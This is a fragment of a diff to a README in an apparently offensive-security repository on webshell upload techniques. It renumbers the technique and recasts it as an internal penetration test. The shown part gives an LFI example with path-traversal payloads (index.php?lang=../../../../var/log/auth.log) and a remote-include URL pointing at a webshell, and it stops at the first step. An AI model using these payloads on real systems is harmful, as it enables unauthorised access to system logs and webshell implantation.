Jean-Francois-C/Webshell-upload-techniques/README.md

 	   - http://x.x.x.x/application/fileviewer.php?p=http://x.x.x.x/webshell
 ```

-##### Technique 7 - Webshell upload by exploiting a LFI vulnerability
+##### Technique 10 - Webshell upload by exploiting a LFI vulnerability
 ```
 Example
 ➤ Step 1.
-You find a website on an internal network that is vulnerable to a Local File Include vulnerability and you can read log files such as '/var/log/auth.log' and '/var/log/mail'.
+You find a website during an internal penetration test that is vulnerable to a Local File Include vulnerability and you can read log files such as '/var/log/auth.log' and '/var/log/mail' thanks to the LFI flaw.
 	   Examples:
 	   > http://website/index.php?lang=../../../../var/log/auth.log
 	   > http://website/index.php?lang=../../../../var/log/mail